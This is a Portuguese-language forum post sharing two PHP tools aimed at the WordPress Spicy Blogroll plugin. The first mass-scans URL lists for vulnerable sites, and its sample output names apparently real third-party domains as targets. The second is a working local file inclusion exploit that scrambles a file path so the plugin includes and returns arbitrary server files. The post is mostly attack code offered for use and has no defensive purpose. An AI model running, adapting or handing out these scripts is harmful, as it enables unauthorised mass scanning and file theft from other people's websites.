Olá a todos!
Escrevi este script que tem como função verificar a existencia do plugin spicy blogroll.
Após isto é possivel efetuar um lfi com a ajuda do xpl automatizado.
Output:
n4sss@blue-wind:~/lov3/Scripts/n4sss/spicy$ php spicy_blogroll.php
php spicy_blogroll.php url_list.txt log.txt threads
Please set the url list with http://
Example:
php spicy_blogroll.php wps.txt ok.txt 20
by n4sss
php spicy_blogroll.php url_list.txt log.txt threads
Please set the url list with http://
Example:
php spicy_blogroll.php wps.txt ok.txt 20
by n4sss
Código PHP:
<?php
/*
* Wordpress Plugin Spicy Blogroll File Inclusion Vulnerability
* Verifier by n4sss.
*
* poc:
* http://www.exploit-db.com/exploits/26804/
*
* Details:
* File: /wp-content/plugins/spicy-blogroll-ajax.php
* SVN Source: http://svn.wp-plugins.org/spicy-blogroll/trunk/spicy-blogroll-ajax.php
*
* n4sss@blue-wind:~/lov3/Scripts/n4sss/spicy$ php spicy_blogroll.php wp.txt log.txt 10
* Simple Spicy Blogroll plagin Check with multithreaded by n4sss
* Wait the get_content
* ---------------------------------------
* Total urls loadeds:1477
* Total threads: 10
* Log to save: log.txt
* ---------------------------------------
* [0] http://pipocaestudio.com.br
* [1] http://da0ra.com
* [2] http://tsiuniao.com.br
* [3] http://airtonfarias.com
* [4] http://casadacaubi.com.br
* [5] http://linhaca.net
* [6] http://dicasdecontabilidade.com.br
* [7] http://linhaca.net
* [8] http://whatisproductmarketing.com
* ----------------------------------------------------
* spicy-blogroll found => http://whatisproductmarketing.com
* Saving to log.txt
* ----------------------------------------------------
* [9] http://zeroseteum.com.br
* [10] http://atmasurfboards.com.br
* --------------------------------------
*
* http://Janissaries.org
* 2013
*
*
* */
set_time_limit(0);
error_reporting(0);
function save($content, $file, $mode){
$fp = fopen($file, $mode);
fwrite($fp, $content."\r\n");
fclose($fp);
}
function verify($url, $log, $th)
{
$count = count($url);
$path = "/wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php";
$multi = curl_multi_init();
$bolean = array_chunk($url,$th);
$a = 0;
foreach($bolean as $fuzz)
{
for($i=0;$i<=count($fuzz)-1;$i++)
{
$ch[$i] = curl_init();
curl_setopt($ch[$i], CURLOPT_URL, $fuzz[$i].$path);
curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch[$i], CURLOPT_TIMEOUT, 10);
curl_multi_add_handle($multi, $ch[$i]);
}
do
{
curl_multi_exec($multi, $handl);usleep(1);
}
while( $handl > 0);
foreach($ch as $ch_id => $bo)
{
$grep[$ch_id] = curl_multi_getcontent($bo);
curl_multi_remove_handle($multi, $bo);
print "[$a] $fuzz[$ch_id]\n";
if(preg_match('#require_once()#si', $grep[$ch_id]))
{
print "----------------------------------------------------\n";
print "spicy-blogroll found => $fuzz[$ch_id]\n";
print "Saving to $log\n";
print "----------------------------------------------------\n";
save("-------------------------\n$fuzz[$ch_id]\n------------------------", "$log", "a");
flush();
}
$a = $a + 1;
}
}
}
if(!@$argv[1] || !@$argv[2] || !@$argv[3])
{
print "php $argv[0] url_list.txt log.txt threads\n";
print "Please set the url list with http:// :) \n";
print "Example:\n";
print "php $argv[0] wps.txt ok.txt 20\n";
print "by n4sss\n";
exit(0);
}else{
$url = explode("\n", file_get_contents("$argv[1]"));
print "Simple Spicy Blogroll plagin Check with multithreaded by n4sss\n";
print "Wait the get_content \n";
print "---------------------------------------\n";
print "Total urls loadeds: ".count($url)."\n";
print "Total threads: $argv[3]\n";
print "Log to save: $argv[2]\n";
print "---------------------------------------\n";
sleep(5);
$log = "$argv[2]";
$th = trim($argv[3]);
verify($url, $log, $th);
}
?>
Uso:
php spicy_xpl.php <host> <path> <file>
Código PHP:
<?php
// Title: Wordpress Plugin Spicy Blogroll File Inclusion Vulnerability
// Date: 12-07-2013 (GMT+8 Kuala Lumpur)
// Author: Ahlspiess
// Greetz: All TBDIAN - http://w3.tbd.my :)
// Screenshot: http://i.imgur.com/jIrUznC.png
/**
Details:
File: /wp-content/plugins/spicy-blogroll-ajax.php
SVN Source: http://svn.wp-plugins.org/spicy-blogroll/trunk/spicy-blogroll-ajax.php
<?php
...
...
$link_url = $_GET['link_url'];
$link_text = $_GET['link_text'];
$var2 = unscramble($_GET['var2']);
$var3 = unscramble($_GET['var3']);
$var4 = unscramble($_GET['var4']);
$var5 = unscramble($_GET['var5']);
$nonce = unscramble($_GET['var11']);
require_once($var2.$var4); <-- Boom
...
...
*/
if(!isset($argv[3])) {
die(sprintf("php %s <host> <path> <file>\n", $argv[0]));
}
list(,$host, $path, $file) = $argv;
$vfile = 'http://%s%s/wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php?var2=%s&var4=%s';
$request = sprintf($vfile, $host, $path, scramble(dirname($file) . "/"), scramble(basename($file)));
$opts = array(
'http'=>array(
'header' => "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0",
'ignore_errors' => true,
)
);
$context = stream_context_create($opts);
echo file_get_contents($request, 0, $context);
/**
Source: http://svn.wp-plugins.org/spicy-blogroll/trunk/spicy-blogroll.php
Line: 386-401
*/
function scramble($text1,$rng = 1){
$len=strlen($text1);
$rn=$rng%2;
$count=7;
$seed=($rn%=2)+1;
$text2=chr($seed+64+$rng).chr($rng+70);
for($i=0; $i<=$len-1; $i++) {
$seed*=-1;
$count+=1;
$ch=ord(substr($text1,$i,1))+$seed;
if($ch==92){$ch.=42;}
$text2.=chr($ch);
if($count%5==$rn){$text2.=chr(mt_rand(97,123));}
}
return $text2;
}
?>
[ame="http://www.youtube.com/watch?v=1DiZhD9HpsI"]http://www.youtube.com/watch?v=1DiZhD9HpsI[/ame]
[]'s